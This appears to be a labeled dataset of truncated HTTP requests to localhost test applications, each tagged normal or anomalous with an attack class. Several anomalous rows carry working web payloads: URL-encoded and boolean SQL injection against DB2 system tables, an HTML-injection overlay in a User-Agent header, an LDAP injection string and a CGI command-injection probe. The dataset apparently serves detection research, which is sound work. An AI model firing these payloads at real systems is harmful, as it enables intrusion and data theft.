GET /rest/products/search?q=%74%65%73%74%27%29%29%29%2F%2A%21%61%6E%44%2A%2F%36%32%31%32%3D%28%2F%2A%21%53%65%6C%65%43%54%2A%2F%43%6F%55%6E%54%28%2A%29%2F%2A%21%46%52%4F%6D%2A%2F%53%59%53%49%42%4D%2E%53%59%53%54%41%42%4C%45%53%2F%2A%21%61%53%2A%2F%54%31%2C%53%59%53%49%42%4D%2E%53%59%53%54%41%42%4C%45%53%2F%2A%21%61%53%...
anomalous
SQL Injection
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 8fa0a9fc-2969-4fdc-8236-632e8ffe8907
normal
null
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 7657f0a6-b482-4447-a0cd-a85e7828bdf1
normal
null
GET /vulnerabilities/sqli/?id=1 HTTP/1.1 User-Agent: <div style="position:fixed;top:0;left:0;width:100%;height:100%;background:red;color:white;font-size:5vw;display:flex;align-items:center;justify-content:center;z-index:999999;">SECURITY BREACH</div> Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application...
anomalous
HTML_Injection
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/...
anomalous
XML_External_Entity
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: f22ac7c1-5553-4d5d-bbb1-b1178cc08e7d
normal
null
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Enc...
anomalous
Cross-Site_Scripting
GET /rest/products/search?q=sale&cache_id=4b15410a-7d34-44be-b0e5-f978e2beb70a HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 4b1...
normal
null
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko) Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate ...
anomalous
Cross-Site_Request_Forgery
GET /db.jar HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.8 Accept: */* Accept-Language: en Accept-Encoding: gzip Connection: close
anomalous
Advanced Vulnerability Scan
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 537cace1-9f4d-452a-b2fb-ac1b7c0c29c9
normal
null
GET /vulnerabilities/sqli/?id=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 ...
anomalous
XML_External_Entity
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 33acf0ed-5926-4b41-830f-508c33fd03f8
normal
null
GET /rest/products/search?q=test HTTP/1.1 Cache-Control: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 Referer: %68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%3A%33%30%30%30%2F%72%65%73%74%2F%70%72%6F%64%75%63%74%73%2...
anomalous
SQL Injection
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/...
anomalous
Directory_Traversal
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko) Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate ...
anomalous
Directory_Traversal
GET /vulnerabilities/sqli/?id=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 ...
anomalous
CRLF_Injection
GET /?ref=febe0428-5684-411b-b1a6-973be2447f1a&session_token=1543 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: febe0428-5684-41...
normal
null
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Acce...
anomalous
Cross-Site_Request_Forgery
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: cf82f3dc-8b78-43b1-891e-c9ae15687fdd
normal
null
GET /vulnerabilities/sqli/?id=title=*%00 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encodi...
anomalous
LDAP_Injection
GET /vulnerabilities/sqli/?id=1&Submit=Submit%29%20OR%205815%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- HTTP/1.1 Cache-Control: no-cache Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low User-Agent: Mozilla/5.0 (Macintosh; Int...
anomalous
SQL Injection
GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Connection: close Accept-Encoding: gzip
anomalous
Advanced Vulnerability Scan
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1 Cache-Control: no-cache Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15,(CASE WHEN 3019=3019 THEN 1 ELSE NULL END) Referer:...
anomalous
SQL Injection
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: b163327d-0f03-45d3-b3e3-b4fee84d1394
normal
null